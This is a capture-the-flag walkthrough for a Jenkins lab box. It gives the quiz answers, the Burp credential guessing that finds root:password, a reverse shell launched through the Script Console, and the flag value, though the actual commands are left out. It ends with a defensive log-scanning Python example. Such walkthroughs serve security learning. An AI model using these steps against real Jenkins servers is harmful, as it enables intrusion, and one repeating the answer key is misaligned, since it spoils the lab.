Pennyworth
Task 1: What does the acronym CVE stand for?
Common Vulnerabilities and Exposures
Task 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?
Confidentiality, Integrity, Availability
Task 3: What is the version of the service running on port 8080?
Run the following nmap command:
The answer is Jetty 9.4.39.v20210325
Task 4: What version of Jenkins is running on the target?
Start by going to your web browser and typing in http://[Target IP]:8080
At the login page, the source code does not tell us anything useful.
Try some default passwords. Nothing usual works.
Run the request through Intruder in Burp Suite to guess the username and password.
This shows that root:password is a valid login.
On the admin page, the bottom right-hand corner shows the Jenkins version: 2.289.1
Task 5: What type of script is accepted as input on the Jenkins Script Console?
On the first admin page, it states Groovy Script
Task 6: What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?
I believe they are asking what the CLI is for Windows:
cmd.exe
Task 7: What is a different command than "ip a" we could use to display our network interfaces' information on Linux?
On Linux, a similar command would be:
ifconfig
Task 8: What switch should we use with netcat for it to use UDP transport mode?
Quick help search on netcat shows:
The answer is -u
Task 9: What is the term used to describe making a target host initiate a connection back to the attacker host?
I just know this as "reverse shell"
Capture the Flag:
Browse for vulnerabilities in Jenkins.
Discovered https://github.com/gquere/pwn_jenkins
There are multiple ways to bypass login, but at the end is a script you can plug in to the "Script Console" in the "Manage Jenkins" tab on the right.
Start up a netcat listener on the host machine:
In the "Script Console", plug in the following command from the GitHub link above to make a reverse shell connection back to the host machine.
The flag is located in /root/flag.txt
The flag is "9cdfb439c7876e703e307864c9167a15"
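A detection-side view of the login guessing and Script Console steps above, as an added example that is not part of the original writeup: it scans web access-log lines for repeated POSTs to the Jenkins login endpoint and for Script Console requests. The log lines are constructed, and the combined log format (for example from a reverse proxy in front of Jenkins), the root context path and the threshold of 5 are assumptions.

```python
import re
from collections import Counter

# Combined-log-format prefix: client IP, method, request target, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LOGIN_PATH = "/j_spring_security_check"     # Jenkins login form POST target
CONSOLE_PATHS = ("/script", "/scriptText")  # Groovy Script Console endpoints
LOGIN_THRESHOLD = 5                         # assumed tuning value


def analyze(log_text, threshold=LOGIN_THRESHOLD):
    """Return (ip, finding) pairs for login guessing and Script Console use."""
    logins, console = Counter(), Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing
        ip, method, target, _status = m.groups()
        path = target.split("?", 1)[0].rstrip("/") or "/"
        if method != "POST":
            continue
        if path == LOGIN_PATH:
            logins[ip] += 1
        elif path in CONSOLE_PATHS:
            console[ip] += 1
    findings = []
    for ip in sorted(set(logins) | set(console)):
        guessing, ran_script = logins[ip] >= threshold, console[ip] > 0
        if guessing and ran_script:
            findings.append((ip, "login-guessing-and-script-console"))
        elif guessing:
            findings.append((ip, "login-guessing"))
        elif ran_script:
            findings.append((ip, "script-console-use"))
    return findings


def _line(ip, method, path, status):
    # Builds one constructed log line; addresses are documentation ranges.
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "{method} {path} HTTP/1.1" {status} 0'


SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", "POST", LOGIN_PATH, 302)] * 6
    + [_line("203.0.113.7", "POST", "/script", 200),
       _line("198.51.100.4", "POST", LOGIN_PATH, 302),
       _line("192.0.2.9", "POST", "/scriptText", 200),
       "not a log line"]
)

if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG):
        print(ip, finding)
```

Any Script Console request is reported even without a preceding burst of logins, since the console runs arbitrary Groovy on the controller and its use is worth reviewing on its own.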